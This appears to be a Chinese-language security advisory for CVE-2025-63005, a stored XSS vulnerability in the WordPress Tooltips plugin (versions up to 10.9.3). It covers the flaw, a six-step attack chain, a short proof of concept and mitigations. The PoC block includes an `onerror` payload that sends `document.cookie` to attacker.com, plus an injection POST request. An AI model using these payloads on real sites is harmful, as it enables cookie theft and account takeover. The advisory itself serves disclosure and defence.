CVE-2025-63005 WordPress Tooltips插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-63005

漏洞类型

存储型XSS

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

WordPress Tooltips (wordpress-tooltips)

漏洞概述

CVE-2025-63005是WordPress Tooltips插件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞由于插件在处理用户输入时未对特殊字符进行充分过滤和转义，导致攻击者可以在网站的工具提示（tooltips）功能中注入恶意JavaScript代码。当其他用户访问包含恶意工具提示的页面时，这些脚本将在其浏览器上下文中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。此漏洞影响WordPress Tooltips插件从最初版本到10.9.3的所有版本。攻击者需要具有低权限（如订阅者或贡献者角色）才能利用此漏洞，但攻击成功后可以在管理员访问受影响页面时执行任意JavaScript代码，可能导致严重的账户接管风险。由于存储型XSS的特性，恶意脚本会持久存在于数据库中，对所有访问相关页面的用户构成威胁。

技术细节

该存储型XSS漏洞存在于WordPress Tooltips插件的tooltips数据处理流程中。攻击者通过在创建或编辑工具提示内容时注入恶意JavaScript代码（如<script>alert(document.cookie)</script>或<img src=x onerror=...>等payload），由于插件未对输入内容进行适当的HTML转义或内容安全策略（CSP）限制，这些恶意代码会被直接存储到WordPress数据库中。当其他用户访问包含该工具提示的页面时，服务器从数据库读取并直接在页面HTML中输出这些未转义的内容，导致浏览器将其作为可执行脚本解析。攻击者可以利用此漏洞窃取受害者的认证令牌、修改页面内容、进行钓鱼攻击或进一步利用管理员权限进行WordPress核心文件修改等高危操作。漏洞的利用需要攻击者具有至少订阅者级别的账户权限。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress Tooltips插件版本，确认版本<=10.9.3以确定漏洞存在

STEP 2

账户获取

攻击者注册或获取目标WordPress站点的低权限账户（如订阅者角色），或利用已有账户

STEP 3

恶意代码注入

通过插件的工具提示创建/编辑功能，提交包含XSS payload（如<script>标签或事件处理器）的工具提示内容

STEP 4

数据持久化

恶意代码被未经转义处理直接存储到WordPress数据库中，成为持久性威胁

STEP 5

触发执行

当管理员或其他用户访问包含该工具提示的页面时，服务器从数据库读取并输出未转义的恶意代码

STEP 6

恶意操作执行

受害者浏览器执行恶意JavaScript代码，可能导致会话劫持、Cookie窃取或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-63005 WordPress Tooltips Stored XSS PoC // Author: [email protected] // Payload: <script>alert(document.cookie)</script> // or // Payload: <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> // Steps to exploit: // 1. Login to WordPress with low-privilege account (subscriber/contributor) // 2. Navigate to Tooltips settings or create new tooltip // 3. Insert XSS payload in tooltip content field // 4. Save the tooltip // 5. When admin or other users view pages with this tooltip, XSS will execute // Example HTTP POST request: /* POST /wp-admin/admin.php?page=wordpress-tooltips HTTP/1.1 Host: target.com Cookie: [authenticated cookie] Content-Type: application/x-www-form-urlencoded tooltip_content=<script>alert(document.cookie)</script>&action=save_tooltip */ // Detection: Check for unescaped HTML in tooltip storage and output // The plugin should use htmlspecialchars() or wp_kses() before storing/outputting data

影响范围

WordPress Tooltips (wordpress-tooltips) <= 10.9.3

防御指南

临时缓解措施

在官方补丁发布前，可以临时采取以下措施：1）限制WordPress Tooltips插件的访问权限，仅允许管理员创建和编辑工具提示；2）使用WordPress安全插件（如Wordfence、Sucuri）增加XSS防护规则；3）实施严格的CSP策略防止恶意脚本执行；4）监控和审计所有工具提示内容的创建和修改记录；5）考虑暂时禁用该插件直到官方修复版本发布。